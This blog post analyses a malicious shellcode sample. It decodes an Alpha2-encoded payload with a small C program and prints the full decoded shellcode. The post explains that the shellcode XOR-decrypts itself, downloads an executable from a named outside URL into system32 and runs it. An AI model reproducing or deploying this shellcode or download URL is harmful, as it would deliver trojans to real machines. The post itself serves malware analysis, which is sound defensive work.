A little Google search indicated it was an open source encoding program for shellcode, Alpha2 , which source code was available. According to the source code, the strings below were prefix to the encoded shellcode and should be removed when decoding it.
Then we got the shellcode below:"TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_bodymixedcase_ascii_decoder_body "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRWQgrWTnRK0o6QVQ08Tne3pnTo1htnqu2XPeMPGp
Since the source code was available, I wrote a small program in C to decode it:
#include <stdio.h>After decoding, we could get the decoded shell code:
#include <stdlib.h>
int main(int argc, char argv[], char envp[]) {
int i, ii, A, B, D, E, F;
char c;
while ((i = getchar()) != EOF) {
ii = getchar();
D = (i & 0x0f);
E = (ii & 0xf0) >> 4;
F = (ii & 0x0f);
A = D^E;
B = F;
printf("\\x%X%X", A, B);
}
exit(EXIT_SUCCESS);
}
\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x66\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x8F\xB3\x66\x66\x66\x3C\x02\xC7\x56\x66\x66\x66\xED\x26\x6A\xED\x16\x7A\xCB\xED\x26\x6E\xED\xBE\xED\x15\x5A\xED\x12\x78\x1E\x65\x95\xED\x18\x46\x65\x9D\xED\x28\x72\x55\x8B\x30\x31\x37\xED\x59\x65\x9D\xED\x94\x0C\x68\x3F\x95\xC0\x12\x6E\x3F\x39\xE5\xA1\x62\x23\x84\x8F\x3F\x39\x38\xED\xAB\xED\x20\x42\x65\xA5\xB7\x87\x65\xA7\x55\xAF\x00\xED\x6E\xED\x20\x7A\x65\xA5\xA7\x87\x64\x65\xA7\xED\x66\x65\xA5\xED\x9C\xED\x91\xE5\xA0\x68\xED\xB6\x0C\x62\x3F\x8E\x36\x66\x66\x66\xE5\xA0\x6B\x34\x30\x99\x31\x9A\x3C\xED\xBE\x0C\x67\x3F\x8E\x5B\x66\x66\x66\xE5\xA0\x75\x30\x20\xE6\x58\xE6\x13\x9C\xE6\x50\xE6\x38\xE5\x8A\x46\xED\xBA\x0C\x46\x35\x99\x31\x8A\xA1\x62\x65\x3A\x07\x48\x03\xA1\x22\x65\x62\x1E\x03\x66\x66\x55\xA6\x36\x36\x35\x30\x36\x99\x31\x9A\xED\xBA\x36\x35\x99\x31\x96\x36\x99\x31\x92\x55\xA6\xCA\xE3\xA6\x13\x9F\x37\x34\x30\x35\x99\xB4\x3C\x3F\xCD\x84\x88\x55\xA6\xA5\x8E\x40\x99\x99\x99\x21\x03\x12\x36\x14\x09\x05\x27\x02\x02\x14\x03\x15\x15\x66\x21\x03\x12\x35\x1F\x15\x12\x03\x0B\x22\x0F\x14\x03\x05\x12\x09\x14\x1F\x27\x66\x31\x0F\x08\x23\x1E\x03\x05\x66\x23\x1E\x0F\x12\x32\x0E\x14\x03\x07\x02\x66\x2A\x09\x07\x02\x2A\x0F\x04\x14\x07\x14\x1F\x27\x66\x13\x14\x0A\x0B\x09\x08\x66\x33\x34\x2A\x22\x09\x11\x08\x0A\x09\x07\x02\x32\x09\x20\x0F\x0A\x03\x27\x66\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6B\x6F\x31\x31\x38\x2E\x63\x6E\x2F\x78\x2E\x65\x78\x65\x80\x00This could be converted to an executable file with shellcode_2_exe, and then run the executable on Ollydbg. As we can see, the shell code was still encrypted, and the first thing it would do was to decode the other part of the codes, 13CH bytes(from 00401017) totally, by “XOR 66H".
Then we got the decrypted shell code. The remaining shell code would call the function UrlDownloadToFile to download a file from http://www.ko118.cn/x.exe and save it to C:\WINDOWS\system32\a.exe, and then call WinExec to run the file a.exe.
The a.exe probably was a downloader which would download more trojans from the Internet.
No comments:
Post a Comment